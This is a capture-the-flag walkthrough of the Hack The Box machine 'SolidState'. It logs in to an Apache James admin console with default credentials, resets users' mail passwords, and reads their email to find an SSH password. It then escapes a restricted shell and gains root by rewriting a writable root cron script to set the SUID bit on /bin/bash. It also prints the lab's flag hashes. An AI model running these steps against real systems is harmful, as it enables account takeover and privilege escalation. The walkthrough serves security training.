SolidState - Hack The Box

SolidState is a quick and fun medium box where we’re going to exploit a vulnerability of the service Apache James after that we’re goint to change the credentials of many users of the machine to see through an email from a user of the machine we found credentials to be able to connect via ssh and to be root we have to abuse cron jobs

PortScan

❯ nmap -sCV -p22,25,80,110,119,4555 10.10.10.51 -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-25 13:34 CST
Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 83.33% done; ETC: 13:36 (0:00:18 remaining)
Nmap scan report for 10.10.10.51
Host is up (0.14s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.9 [10.10.14.9])
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.92%I=7%D=1/25%Time=63D18455%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPl
SF:ease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswo
SF:rd:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

The port 4555 have a login but we need credentials

❯ nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:

I found credentials

Default credentials

root:root

After that we can connect and see the users

listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

So if we see the webpage of the link we can change the credentials of the users because we’re root

setpassword james james123
Password for james reset

We can try with the user james

❯ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER james
+OK
PASS james123
+OK Welcome james

But we don’t have nothing

HELP
-ERR
?
-ERR
LIST 
+OK 0 0
.

Now change the password of thomas but nothing too

❯ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER Thomas
+OK
PASS thomas123
-ERR Authentication failed.
USER thomas
+OK
PASS thomas123
+OK Welcome thomas
LIST
+OK 0 0
.

Now change the password of john

❯ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER john
+OK
PASS john123
+OK Welcome john
LIST
+OK 1 743
1 743
.
LIST 1
+OK 1 743
RETER 1
-ERR
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James
.

John have information and said mindy have tempory password to login to her accounts

Change the password of mindy

❯ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER mindy
+OK
PASS mindy123
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.

We have the credentials of mindy

mindy:P@55W0rd1!2@

Now we connect via ssh

❯ ssh mindy@10.10.10.51
The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
ECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.51' (ECDSA) to the list of known hosts.
mindy@10.10.10.51's password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ 

User flag

mindy@solidstate:~$ clear
-rbash: clear: command not found
mindy@solidstate:~$ echo $PATH
/home/mindy/bin
mindy@solidstate:~$ pwd
/home/mindy
mindy@solidstate:~$ ls
bin  user.txt
mindy@solidstate:~$ cat user.txt 
6a0424ed1865c1e5efb7f0f2af9b95f8
mindy@solidstate:~$
mindy@solidstate:~$ ls bin/
cat  env  ls
mindy@solidstate:~$

We have problems is a rbash

We want a bash so we can do this

❯ sshpass -p 'P@55W0rd1!2@' ssh mindy@10.10.10.51 whoami
mindy
❯ sshpass -p 'P@55W0rd1!2@' ssh mindy@10.10.10.51 bash
whoami
mindy
pwd
/home/mindy

That works

❯ ssh mindy@10.10.10.51 bash
mindy@10.10.10.51's password: P@55W0rd1!2@
whaomi
bash: line 1: whaomi: command not found
whoami
mindy
script /dev/null -c bash
Script started, file is /dev/null
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 
CTRL+Z
stty raw -echo; fg
reset xterm

Now we have a bash

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ export SHELL=/bin/bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $SHELL
/bin/bash 
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ export TERM=xterm
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $TERM
xterm

Privilege escalation

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find \-perm -4000 2>/dev/null
./bin/su
./bin/mount
./bin/fusermount
./bin/ping
./bin/ntfs-3g
./bin/umount
./usr/bin/newgrp
./usr/bin/pkexec
./usr/bin/passwd
./usr/bin/chsh
./usr/bin/chfn
./usr/bin/gpasswd
./usr/sbin/pppd
./usr/lib/policykit-1/polkit-agent-helper-1
./usr/lib/openssh/ssh-keysign
./usr/lib/eject/dmcrypt-get-device
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/lib/xorg/Xorg.wrap
./usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ 

You can abuse of the pkexec binary but it’s not the idea

Export your path

export PATH=yourpath

And nothing of interest

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ getcap -r / 2>/dev/null
/usr/bin/arping = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/lib/i386-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ 

Now we can see cron jobs you can use pspy or a bash script

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ touch procmon.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ ls
procmon.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ chmod +x procmon.sh 
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ cat procmon.sh 
#!/bin/bash

function ctrl_c(){
	echo -e "\n\n[!] Exit...\n"
	tput cnorm; exit 1
}

# Ctrl+C
trap ctrl_c INT

tput civis

old_process="$(ps -eo command)"

while true; do
	new_process="$(ps -eo command)"
	diff <(echo "$old_process") <(echo "new_process") | grep "[\>\<]" | grep -vE "command|procmon|kworker"
	old_process=$new_process
done
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ 

The most interesting thing the script reported is this

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ ls -l /opt/tmp.py 
-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$

If you use pspy you have to see that

2023/01/26 19:27:01 CMD: UID=0     PID=22630  | /bin/sh -c python /opt/tmp.py 
2023/01/26 19:27:01 CMD: UID=0     PID=22631  | 
2023/01/26 19:27:01 CMD: UID=0     PID=22632  | sh -c rm -r /tmp/*  
2023/01/26 19:27:01 CMD: UID=0     PID=22633  | sh -c rm -r /tmp/*

Root run the script

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ cat /opt/tmp.py 
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ 

The os.system library is imported and is run by root so we can alter that because we have permissions to write the script

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ cat /opt/tmp.py 
#!/usr/bin/env python
import os
import sys
try:
     os.system('chmod u+s /bin/bash')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265272 May 15  2017 /bin/bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$

Now we have to wait the bash to be suid

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1265272 May 15  2017 /bin/bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$

Root flag

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ bash -p
bash-4.4# whoami
root
bash-4.4# cat /root/root.txt
6b4d6ee5878e644dd73e7484a8c68b69